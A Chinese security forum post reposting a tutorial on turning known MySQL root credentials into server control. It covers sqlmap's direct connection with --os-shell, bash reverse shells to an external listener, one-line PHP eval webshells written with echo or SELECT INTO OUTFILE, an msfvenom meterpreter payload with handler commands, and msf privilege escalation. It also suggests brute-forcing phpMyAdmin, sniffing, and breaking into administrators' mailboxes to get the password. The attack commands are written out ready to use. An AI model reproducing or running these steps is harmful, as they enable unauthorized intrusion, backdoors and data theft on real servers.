安全矩阵

 找回密码
 立即注册
搜索
查看: 1110|回复: 0

使用sqlmap直连数据库获取webshell

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-9-8 10:08:18 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-9-8 10:10 编辑



使用sqlmap直连数据库获取webshell

原创 simeon的文章 小兵搞安全
2022-09-04 18:45 发表于北京
转载自:使用sqlmap直连数据库获取webshell

在有些场景下,需要通过mysql直接连接来获取权限,例如通过暴力破解、嗅探等方法获取了账号及口令,服务器有可能未开放web服务。

1.1.1适用场景
1.获取了Mysql数据库root账号以及密码。
2.可以访问3306端口以及数据库。

1.1.2扫描获取root账号的密码
通常有下面一些方法来获取root账号的密码
(1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html
http://pan.baidu.com/s/1c1LD6co,通过收集phpmyadmin地址进行暴力破解。
(2)代码泄露获取数据库账号和密码
(3)文件包含读取配置文件中的数据库账号和密码
(4)通过网络嗅探获取
(5)渗透运维人员的邮箱及个人主机获取

1.1.3获取shell

1.通过sqlmap连接mysql获取shell
(1)直接连接数据库
sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell
(2)通过选择32位或者64位操作系统,获取webshell,执行
bash -i >& /dev/tcp/192.168.1.3/8080 0>&1
(3)反弹到服务器192.168.1.3,在实际中192.168.1.3为外网独立IP。
(4)通过echo命令生成shell:
echo "<?php @eval($_POST['chopper']);?>" >/data/www/phpmyadmin/1.php
如果能够通过phpmyadmin管理数据库,则可以修改host为“%”并执行权限更新,下面命令可参考:
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES ;
注意:如果数据库中有多个host连接,修改时可能会导致数据库连接出问题。

2.通过msf反弹
(1)使用msfvenom生成msf反弹的php脚本木马,默认端口为4444:
msfvenom-p  php/meterpreter/reverse_tcp LHOST=192.168.1.3 -f raw > test.php
(2)在独立IP或者反弹服务器上运行msf依次执行以下命令:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.3 //192.168.1.3为反弹监听服务器IP
show options
run 0 或者exploit
(3)上传并执行php文件
将test.php上传到192.168.1.2服务器上面,访问后即可获取msf反弹shell
http:// 192.168.1.2:8080/test.php
3.通过phpmyadmin管理界面查询生成webshll
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'D:/work/WWW/antian365.php'

1.1.4一个实例

1.直接连接mysql数据库
执行命令:sqlmap.py -d "mysql://root:123456@2**.****.**.**:3306/mysql" --os-shell
如图1所示,需要设置后端数据库的架构,服务器多为64位,可以先选择64位即输入数字2进行测试,如果不是,可以退出后再次运行并选择。
图1选择服务器数据库所在架构
2.上次udf文件
选择系统架构后,sqlmap会自动上传udf文件到服务器提权位置,如图2所示,会显示一些信息。Sqlmap不管获取的shell是否成功都显示os-shell提示符。
图2获取os-shell
3.执行命令
针对相应的系统执行一些命令来验证是否真正获取shell,如图3所示,执行cat  /etc/passwd命令来查看passwd文件内容,在本例中成功获取shell。
图3执行命令
4.获取反弹shell
虽然通过sqlmap获取了shell,但shell中操作不方便,可以在具备独立IP的服务器上执行:
nc –vv –l –p 8080
在sqlmap的shell段执行:
bash -i >& /dev/tcp/24.11.123.222/8080 0>&1
说明:
(1)24.11.123.222为独立IP
(2)需要在24.11.123.222上执行上面的nc监听命令
(3)24.11.123.222服务器需要对8080端口放行,或者在防火墙中开放8080端口,如图4所示,成功反弹shell。
图4成功反弹shell
5.在服务器上生成webshell
在反弹的shell中通过执行locate *.php命令来定位服务器网页的真实路径,然后到该路径下,通过echo命令生成webshell,如图5所示,直接通过echo命令生成webshell一句话后门。
图5生成webshell一句话后门文件
6.获取webshell
使用中国菜刀一句话后面管理器创建记录并连接,如图6所示,成功获取webshell。
图6获取webshell
7.通过phpmyadmin生成一句话
如图7所示,通过phpmyadmin登录后台后,在sql查询中执行命令:
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE '/data/www/phpmyadmin/eval.php'
注意:通过phpmyadmin生成一句话需要知道网站的真实路径。可以通过查看数据库表以及phpinfo,登录后台,出错等来获取真实路径地址。
图7通过phpmyadmin获取webshell
8.通过msf反弹获取shell
本意是通过msfvenom命令生成msf反弹网页木马,通过msf获取shell,并进行提权,如图8所示,执行后,成功获取shell但真正能够通过msf进行提权成功的很少。
图8msf反弹获取shell
9.msf提权参考
(1)msf提权参考
通过msf反弹shell,执行background将session放在后台运行,然后搜索可以利用的exploit来进行测试。下面是一些可以供参考的命令:
background
search “关键字” //seach ssh seach “/exploit/linux/local”
use exploit/linux……
show options
set session 1
exploit
sessions -i 1
getuid
在msf平台上面执行search后,查找的结果中选择时间较新和excellent的成功提权的几率比较大,在提权前,最好更新msf到最新版本,另外一个搜索exploit的命令为:
searchsploit linux local 2.6.32 //执行效果如图9所示。
图9搜索exploit



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 01:00 , Processed in 0.014448 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表